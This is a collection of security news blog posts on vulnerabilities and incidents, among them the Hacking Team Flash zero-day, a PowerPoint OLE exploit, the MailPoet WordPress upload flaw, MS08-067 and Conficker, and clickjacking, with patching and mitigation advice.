Adobe Set To Tackle Hacking Team Flash Threat

There has been much said about the Hacking Team story over the last few days, ranging from the ethics of the company’s business through to concerned individuals who say they’ve found the software in question on their systems.

Now, though, there is another facet to the tale – a new Adobe Flash vulnerability discovered in the 400 or so gigabytes of documents leaked in the wake of the breach.

Data belonging to the Italian firm, first posted online on Sunday, suggested it knew of a serious flaw in Flash but did not communicate that fact to Adobe [our CEO, Brian Honan recently offered up some golden advice on vulnerability disclosure]. Now, fast-moving exploit kit developers have apparently taken advantage of that situation with CSO Online reporting that:

Exploit kit developers were quick to weaponize it thanks to detailed instructions provided by Hacking Team documentation.

CSO’s Steve Ragan noted that attacks have been spotted in both the Chrome and Firefox browsers.

Meanwhile, Jerome Segura from Malwarebytes described what Hacking Team called “the most beautiful Flash bug for the last four years” as:

One of the fastest documented cases of an immediate weaponisation in the wild, possibly thanks to the detailed instructions left by the Hacking Team.

Speculating as to why Hacking Team, which sells spying software to governments and their intelligence agencies around the world, may have kept the news of the vulnerability to itself, Bharat Mistry of Trend Micro said:

When you know the severity of a flaw, there’s a duty to disclose it to the software vendor.

Maybe they saw this as an avenue they could use for their own purposes and wanted to keep it under wraps.

But Flash has a big presence on the web. There is mass potential for this bug to be exploited by criminals.

The security firm also said there is evidence that the bug is already being exploited in active attacks, though it did say that the Hacking Team code took advantage of a trick first observed at this year’s Pwn2Own.

Commenting on the news, Ken Westin, Senior Security Analyst at Tripwire, said:

The market for zero day vulnerabilities is alive and well and as the Hacking Team breach has revealed is also highly profitable.

As many governments move to try and control malware and offensive security tools, some have been caught with their own hands in the cookie jar, leading many to wonder how and why governments and agencies listed as Hacking Team clients are using these tools and if they are doing so lawfully.

Given the depth and amount of data compromised in this breach, it will reveal a great deal about the market for offensive tools designed for espionage with a great deal of fallout and embarrassment for some organizations.

For its part, Adobe has confirmed that the vulnerability could “cause a crash and potentially allow an attacker to take control of the affected system”.

A security bulletin from the company noted how the flaw affected  Flash Player and earlier versions for Windows and Macintosh, as well as Flash Player Extended Support Release version and earlier 13.x versions for Windows and Macintosh, and Flash Player and earlier 11.x versions for Linux.

The vulnerability – identified as CVE-2015-5119 – will be patched later today it said.

Computer Issues Ground Polish Planes But Was It A Hack?

I’ve often seen it said that flying is the safest form of travel (don’t believe it myself, damn phobia) but, according to recent events, it also appears to be the most hacked too.

Just one month on from all the hoo-ha about Chris Roberts hacking into a plane’s systems to steer the aircraft, and two months after American Airlines flights experienced significant downtime after the iPads they use for distributing flight plans crashed, we’ve now seen further flights apparently grounded by hackers.

Over the weekend, some 1,400 passengers were stranded in Warsaw after Poland’s national airline – LOT – discovered it could not log the flight plans for its departing aircraft.

That, according to Reuters, was because hackers had targeted the ground computer systems at Chopin airport.

Company spokesman Adrian Kubicki said the afternoon hack affected flights for around five hours, grounding ten of them and delaying a dozen more.

In a press release, LOT said:

Today afternoon LOT encountered IT attack, that affected our ground operation systems. As a result we’re not able to create flight plans and outbound flights from Warsaw are not able to depart. We’d like to underline, that it has no influence on plane systems. Aircrafts, that are already airborne will continue their flights. Planes with flight plans already filed will return to Warsaw normally.

In a subsequent release the airline explained how it regained control of its IT systems quickly and was working to restore normal service just as fast as it could.

With further details of the claimed attack hard to come by, speculation has been rife over just what really happened. Given how airline hack stories are ‘hot’ in the media right now, it is understandable that this incident would be labelled such but it is, until confirmed otherwise, just as likely to be a computer glitch, a hypothesis first put forward by ‘Information Security Pornstar’ the grugq who said:

The story doesn’t make sense, and most of the actual info so far suggests a “glitch” caused by an unauthorized user.

Whatever the case may be, the grounding of Polish airplanes, along with iPad glitches and the confirmed hacking of inflight entertainment systems certainly should be raising some eyebrows and prompting security and staff training reviews, or so I would hope.

As our CEO Brian Honan wrote for CSO Online,

Like so many other business sectors around the world airlines are taking advantage of the benefits computer systems can bring in improving their processes, enhancing the customer experience, and reducing costs. Given the nature of their business the security of these computer systems, both in the air and on the ground, is of tantamount importance to airlines and their passengers.  The events of today in Poland and the other previous events have raised more questions than answers regarding airline security.

LOT continues to investigate the incident and says it will share what it learns with law enforcement agencies. Kubicki suggested the biggest concern was the fact that LOT’s systems were the same ones used by other airlines, meaning an attack (if that is what this is) could be equally successful against them too.

Microsoft Warns Users Over PowerPoint Zero Day, Releases Fixit

Microsoft has warned Windows users that cyber criminals are exploiting a zero-day vulnerability using malicious PowerPoint documents.

The vulnerability affects all versions of Windows except Windows Server 2003.

Microsoft has already released a Fixit tool that neuters known PowerPoint attacks but there is a risk that new attacks may yet spring up. The fix, found here, is not available for 64-bit versions of PowerPoint run on 64-bit versions of Windows 8, Windows 8.1, Windows Server 2012, or Windows Server 2012 R2.

The exploit is a remote code execution vulnerability which means a successful attack would allow an attacker to hijack a PC after a user opens up an affected Office document, potentially opening the door for further attacks in the form of other malware then being planted, or to the theft of personal or sensitive data stored on the target machine.

In the case of a successful attack, the infiltrator would have access to the same privileges as the user which could be a significant problem for those who log on as an administrator, or those who get waylaid by a User Account Control (UAC) prompt that appears when the document is opened – Microsoft reports that a UAC prompt appears in every attack it is aware of.

While a UAC prompt appearing upon the opening of a document is not normal, many users may not be aware that is the case, again highlighting why security awareness is so important both within the business realm and among home users.

Of course it isn’t only Microsoft Office documents that pose a threat here – other files could do too if the corresponding application supports OLE (object linking and embedding) objects.

Commenting on the news, Sagie Dulce, security research engineer at Imperva said:

“This was recently discovered by iSight. They exposed a Russian hacker group they call SandWorm.

This vulnerability was used for the initial compromise. Using social engineering, this group gained initial foothold on machines, by convincing the victim to open a PowerPoint document.
The victim also had to click “allow” when opening the file, to allow a malicious code to be executed.

“According to iSight: “there have been several confirmed incidents in Ukraine, Poland, Western Europe and the United States since at least 2009. NATO, the public sector and private firms in energy and telecommunications have been targeted.”

“The malware identified related to this attack is BlackEnergy. Early version of which were used for DDos, spam and CC theft.

Because this campaign seems to be government sponsored, the malware was probably used to download additional components after the initial exploit (and not perform DDoS..)

“Apart from the newest zero day, these attackers exploited a range of Office related exploits, dating back to 2010.”

While Mark Sparshott, EMEA director at Proofpoint highlighted how the bad guys could employ phishing techniques to get infected emails onto a target system:

“Object Linking & Embedding (OLE) is legitimately used to display parts of a file within another file, e.g. to display a chart from an Excel Spreadsheet within a PowerPoint presentation. This is not the first time that a vulnerability in OLE has been exploited by cybercriminals, however most previous OLE vulnerabilities have been limited to specific older versions of the Windows operating system. What makes this vulnerability dangerous is that it affects the latest fully patched versions of Windows.

The race is on. Cybercriminals will use phishing and longlining emails containing URL links to websites hosting malicious files that exploit this vulnerability or attach the malicious file to the email itself. While Microsoft and security vendors rush to close the security hole the best form of defence remains using the latest next generation detection technologies such as sandboxing at the email gateway to prevent the emails reaching users in the first place. Organisations not yet using advanced detection tools will need to fall back to notifying users and relying on them not to click the links and open files, unfortunately Proofpoint’s Human Factor Report highlighted that staff click on 1 in 10 malicious links on average so cybercriminals will see a lot of success before the security gap on this vulnerability is closed.”

Mark James, security expert at ESET made the point that the end user would need to initiate the attack in some way, thus highlighting yet again how technology can only take security so far:

“These particular attack vectors are created from a number of opportunities, either the user must be directed to an offending website or an email containing the compromised file would need to be opened. If directed to a website then an email containing a link with a promise of a reward or benefit would arrive in your inbox, which, if clicked, would present you with in this case a PowerPoint show or presentation (All Microsoft Office file types as well as many other third-party file types could contain a malicious OLE object) again containing some kind of enticing properties (celebrities are often used in these cases). If you are tempted to click and open the file you could open up the possibility of being infected by further malware.

Obviously in this case, and many other similar scenarios, the end user must initiate the means to be infected. User Account Control (UAC) will help protect you in these cases and is on by default in operating systems from Vista onwards. Users should also always be mindful of emails containing links or files even from sources they trust. It’s better to delete and ask the sender to send again than to chance being infected and opening up your whole business network to malware attack. Also, wherever possible, do not use an administrator account when working with emails. These vulnerabilities take on the same access rights as the account that executed the file, if that is full admin rights then you’re in a whole world of trouble.”

Lamar Bailey, director of security research and development at Tripwire played down the threat posed by the zero day, saying:

“This is not a major issue. The vulnerability is just an escalation of privilege issue and requires a watering hole attack and/or persuading the victim to open a file to exploit.  If a user can be convinced via email, instant message, social media, or in some manner to open a PowerPoint attachment then the attacker will gain the same user rights as the current user.

If the current user has the ability to install programs or access critical systems in the environment this could be used by attackers to gain a foothold in a network and the exploited system would be used as a base of attack.

Users should know better than to open attachments from unknown sources in email or downloading documents from random internet sites. A successful attack will likely spoof and email from an internal user or put a malicious file on a compromised site.”

While I agree that the issue shouldn’t be a major one for the reasons Lamar mentions, it is unfortunate that in 2014 not every user understands the need to be careful when opening emails or downloading documents, whatever their source.

Until at least a moderate appreciation of security issues is held by the population at large, such attacks will still, alas, continue to be successful for those that launch them.

MailPoet Newsletters Plugin For WordPress Vulnerable, Update Available

If you have responsibility for a corporate blog (or run your own) and it runs on WordPress and has a newsletter then I would suggest that you check how your newsletters are handled.

If you find that your blog relies upon MailPoet (a plugin that has been downloaded over 1.7 million times) then you need to be aware that a vulnerability was discovered yesterday which allows a hacker to upload just about anything to the affected site without any form of authentication being required.

Daniel Cid, CTO of Sucuri, gave the following warning in a blog post:

“If you have this plugin activated on your website, the odds are not in your favor. An attacker can exploit this vulnerability without having any privileges/accounts on the target site. This is a major threat, it means every single website using it is vulnerable.”

Sucuri researchers, who kept most of the technical details to themselves for obvious reasons, said that the vulnerability allows a potential attacker to do just about anything on his victim’s website, such as sending out spam, affecting other sites on the same shared host, acting as a lure for phishing attacks and hosting malware directly.

Cid explained that:

“The basics of the vulnerability however is something all plugin developers should be mindful of: the vulnerability resides in the fact that the developers assumed that WordPress’s “admin_init” hooks were only called when an administrator user visited a page inside /wp-admin/.

It is a easy mistake to make and they used that hook (admin_init) to verify if a specific user was allowed to upload files.

However, any call to /wp-admin/admin-post.php also executes this hook without requiring the user to be authenticated. Thus making their theme upload functionality available to everybody.”

Cid goes on to say that the research team shared their findings with the plugin author a few weeks ago and, to their credit, they responded well and issued a new patched version (2.6.7) yesterday. Unfortunately, however, the author makes little mention of the security issue, bar one line in the changelog, so its quite likely that a large number of users may not be aware of the pressing need to install the latest version.

If you are using the MailPoet plugin then you should check now that you have the latest version installed.

If you don’t then you can navigate to your blog’s Dashboard.

From there, click on Plugins > Update Available and look for the MailPoet plugin. Directly underneath it you will see the option to ‘upgrade now’. Click on that and follow the instructions.

Alternatively, you can find the plugin via (click here), download the latest version and then follow the installation guide.

As ever, I would advise running a full backup of your site before making any changes such as updating core files or plugins and, if you don’t already have one, now would also be a good time to implement a regular backup schedule, just in case anything does ever go wrong in the future (WordPress is a popular target for attackers and this isn’t the first time that a noteworthy plugin has had issues lately).

List of the TOP 25 Most Dangerous Programming Errors Released

Earlier today the List of the Top 25 Most Dangerouse Programming Errors was released.  The list was compiled by a number of different organisations and coordinated by the SANS Institute

Criminals are now moving from attacking the infrastructure layer and moving to finding ways into systems by means of bugs in the applications sitting on top of the infrastructure.   In light of this change in tactics it is very important that if you are responsible for developing applications that you ensure that your code does not contain any of these errors.  If you are not responsible for developing applications then make sure this list get to those who are and that they pay heed to it.

SSL Certificates Vulnerable to Attack

The computer security community is abuzz with the news announced today by a team of security researchers at the 25th Chaos Communication Congress in Berlin.  The researchers were able to demonstrate how they were able to generate a fake Certificate Authority certificate and thereby allowing them to impersonate any secure website using SSL certificates.

The research is very interesting and the full paper is available here.  What I particularly liked is they used an array of 200 PS3 game consoles to break the certificate.

However, before we all panic and think that the Internet as we know it has come to an end, we should note that the attack has a number of limitations.  Firstly the attack is against the MD5 algorithm, which has known weaknesses since 2004.  Secondly the certificates broken were using sequential serial numbers.  Finally, the researchers have kept their methods to themselves to allow vendors time to address the issue.

Wired magazine has a good write up on the issue, while Rich Mogull has an excellent post on his blog as to why we should not panic with regards to this issue, as does the Security Uncorked blog.  The Errata Security Blog also highlights that not all certificates based on MD5 are vulnerable.  The SANS Internet Storm Center also has a good write up of the issue with a list of vendor statements regarding the status of their certificates.

You can also use this site to check what SSL certificates are being used by a site you are visiting.

Microsoft To Release Out Of Cycle Patch for IE Vulnerability

Microsoft has announced that it will release an out of band patch for the vulnerability in Internet Explorer as outlined in the Microsoft Security Advisory 961051.

The patch will be released on the 17th December 2008.

Microsoft will host two webcasts to address questions on the patch. The first is scheduled for 13:00 Pacific Time (US Canada) on the 17th of December , you can register for this webcast at

The second is scheduled for 11:00 AM Pacific Time (US Canada) on the 18th of December , you can register for this webcast at

More details on this out of patch band are available at

I was interviewed about this vulnerability on this evening’s Last Word Show on Today FM by Matt Cooper.  A podcast of the show is available here, my piece is about 5 minutes in from the beginning. 

I found it interesting to see how today a security vulnerability is getting press attention, whereas a few years ago it would be computer viruses.  Have we moved on to realise that the threat landscape is changing?

Microsoft Warn of New Attacks Against MS08-067

Microsoft are again urging PC users to apply the MS08-067 emergency patch issued last October due to an increase in attacks aimed at exploiting that vulnerability.  In particular a new worm Worm:Win32/Conficker.A. has been noted as causing a rise in the number of attacks.
Once a PC is infected the Worm:Win32/Conficker.A. will patch the vulnerability to prevent the PC from being exploited by another worm or attacker and will also reset the system restore point to make it more difficult to recover the infected PC.
More details are available on the Microsoft Malware Protection Center Blog at
If you have not yet applied this patch it is strongly recommended that you do.

Microsoft Release Critical Out-Of-Band Patch

Microsoft tonight released a critical patch, MS08-067, outside their normal patch cycle.  For Microsoft to release a patch outside of their patch cycle indicates that this is a serious issue that we must pay attention to. 

I am obviously not the only one who thinks that as the Internet Storm Center‘s Infocon has turned yellow which means they are “currently tracking a significant new threat. The impact is either unknown or expected to be minor to the infrastructure. However, local impact could be significant. Users are advised to take immediate specific action to contain the impact. Example: ‘MSBlaster’ worm outbreak. “

The vulnerability could allow an attacker without authentication to remotely run arbitary code using a specially crafted RPC request on Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems.  This is similar in nature to how the MSBlaster worm propogated throughout the Internet and this vulnerability could be used in the same way.  Microsoft have reported that they have seen live targetted attacks on some customer systems using this vulnerability. 

It is recommended that you patch your systems ASAP.  However patches, be they from Microsoft or other vendors, brings with them many inherent risks that we need to consider before rolling them out onto production systems.  Will the patch introduce new problems as well as fixing the ones identified? Will it impact on other applications and systems?  If we patch we may have problems, if we don’t we may have a security breach.  Not the easiest of choices for an IT or Infromation Security professional to have to make.
I recommend you look at the following steps to mitigate the problem;

  1. A concise and factual presentation should be made to senior management with the options to address the issue laid out clearly, together with the potential downside to each solution.
  2. Whatever solution is decided upon needs to be agreed to and signed off by senior management.
  3. An incident response team should be set up in order to (a) respond to any side effects from the selected plan of action or (b) in the event your systems are compromised in spite of the steps taken.
  4. Remember as part of the plan to ensure that all your backups have been running successfully and more importantly that you can restore them!
  5. Have key contact details for all relevant personnel in the event of a major problem with your systems, including contacts in third parties such as ISPs, partner companies, extranet contacts etc.
  6. Communicate clearly with the user population explaining why the patch is being deployed and to report any unusual behaviour.
  7. Ensure that all Anti-Virus signatures and software is up to date.
  8. Ensure all Intrusion Detection/Prevention Systems’ signatures are up to date.
  9. Consider how best to update remote PCs and laptops that may not be connected to your corporate network.
  10. Make sure your perimeter firewall is configured properly and that where possible personal firewalls are installed on desktops and more importantly on servers.

I strongly advise, as with all patches, to ensure that you test and are satisfied that the patch does not negatively impact your environment before you deploy it.  It also may be worth keeping on high alert even after deploying the patch as;

  1. Other new vulnerabilities could still be found in this feature of Windows.
  2. Not everyone will patch their systems in a timely fashion as we have seen time and time again and their compromise may impact your organisation.

More details are available from the Microsoft Security Response Center and also from the Internet Storm Center.  It is a pity that we do not have our own CERT here in Ireland to help coordinate a response to this issue and help Irish businesses better protect themselves.

Clickjack Proof Of Concept

Details of the much talked about Clickjack exploit are now available on Jerermiah Grossman’s blog, RSnakes blog and Adobe’s websiteJeremiah and RSnakewere meant to demonstrate clickjack at a recent conference but decided not to in order to give the vendors time to address the problem.  Given that this exploit can be used to remotely use a victim’s webcam and/or microphone the implications for stalking, industrial espionage or indeed national security highlight that the guys were right in waiting. 

Jeremiah and Rsnake should be commended on how they handled this issue and credit should also go to the Adobe PSIRT for their response to the problem.